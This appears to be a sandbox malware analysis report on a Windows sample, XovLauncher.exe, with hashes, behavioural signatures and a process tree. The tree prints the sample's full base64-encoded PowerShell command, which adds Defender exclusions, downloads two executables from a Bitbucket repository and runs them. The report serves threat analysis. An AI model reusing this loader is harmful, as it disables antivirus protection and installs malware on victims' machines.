Analysis
-
max time kernel
29s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
07-11-2022 08:52
Static task
static1
Behavioral task
behavioral1
Sample
XovLauncher.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
XovLauncher.exe
Resource
win10v2004-20220812-en
General
-
Target
XovLauncher.exe
-
Size
9KB
-
MD5
abd3e1d69b885d3f98afd426b2157a8f
-
SHA1
e6543de93758224c0b5c7ab70e3dd0b0725a8484
-
SHA256
8d5bbc1df6891d4e6d87702068fedfdccf2533e0fe6648aa12e62766cc20cb54
-
SHA512
ac2a1863cc7b7633d120ee973b27a312e8047e5bb653a3b97207dbbe74d4ee3e4f9291e0a392b46f176cde748c1ac2f8d94936ca0fb19e133afbd269b6c6fd64
-
SSDEEP
192:5xyMD99zXjmYqLDv9lqvk+9xwcvkcFNtUqkAuY7vkadYdR:5xvD99jGLDv90k+9xTk6Nt/zuYDkeoR
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 4 2040 powershell.exe 5 2040 powershell.exe 6 2040 powershell.exe 7 2040 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2040 powershell.exe 2040 powershell.exe 1972 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2040 powershell.exe Token: SeDebugPrivilege 1972 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1536 wrote to memory of 2040 1536 XovLauncher.exe 27 PID 1536 wrote to memory of 2040 1536 XovLauncher.exe 27 PID 1536 wrote to memory of 2040 1536 XovLauncher.exe 27 PID 2040 wrote to memory of 1972 2040 powershell.exe 30 PID 2040 wrote to memory of 1972 2040 powershell.exe 30 PID 2040 wrote to memory of 1972 2040 powershell.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\XovLauncher.exe"C:\Users\Admin\AppData\Local\Temp\XovLauncher.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdwBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGkAZwBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHQAYgBuACMAPgA7ACIAOwA8ACMAdwBjAHAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwB4AGwAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBnAHQAegAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AGMAegAjAD4AOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAYQBuAG8ANgAxADEAMQAvAGYAcwBkAGkAbwBmAG0AaQBzAGQAbgBmAGkAcwBkAG4AZgAvAHIAYQB3AC8AYQA3ADQAYgBjADAANwBkADgAYwAzAGMAMwAxADcANABhADYAOQBkAGYAYwBiADAANwAzADAAMgA5ADgANgAyADIAYQBlADgAYwA1ADcANwAvAG0AMQBtAC4AZQB4AGUAJwAsACAAPAAjAHMAeABoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdAB3AGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegBtAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMARwBlAHQALgBlAHgAZQAnACkAKQA8ACMAZgB3AGYAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAGwAdQBjAGkAYQBuAG8ANgAxADEAMQAvAGYAcwBkAGkAbwBmAG0AaQBzAGQAbgBmAGkAcwBkAG4AZgAvAHIAYQB3AC8AYQA3ADQAYgBjADAANwBkADgAYwAzAGMAMwAxADcANABhADYAOQBkAGYAYwBiADAANwAzADAAMgA5ADgANgAyADIAYQBlADgAYwA1ADcANwAvAGwAaQBtAC4AZQB4AGUAJwAsACAAPAAjAGYAbQBiACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYQB4AHIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeABtAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAQwBoAGUAYwBrAGUALgBlAHgAZQAnACkAKQA8ACMAeABzAHMAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeABxAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGYAcQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEcAZQB0AC4AZQB4AGUAJwApADwAIwBtAHUAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBnAHEAawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegBtAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAQwBoAGUAYwBrAGUALgBlAHgAZQAnACkAPAAjAGgAdQBwACMAPgA="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#igg#>[System.Windows.Forms.MessageBox]::Show('No VPS allowed!','','OK','Error')<#tbn#>;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f3634a54ae6f06684d3a96518e322a83
SHA18d60383fe23fceb0af14b55c635064c8aa00ac2c
SHA25648b363d2ab1d20beeead26e378f820dff78229e878b691dbe0f8ace7e686488c
SHA512066f2f598af3a74272cfb569f55649a135dc34f1f09afc810fecdaffe949d1d45ce42f099c488b2ddf0a5ea00dc61f6142b2ac5fe9ff522a09f1d13b7c3ceed9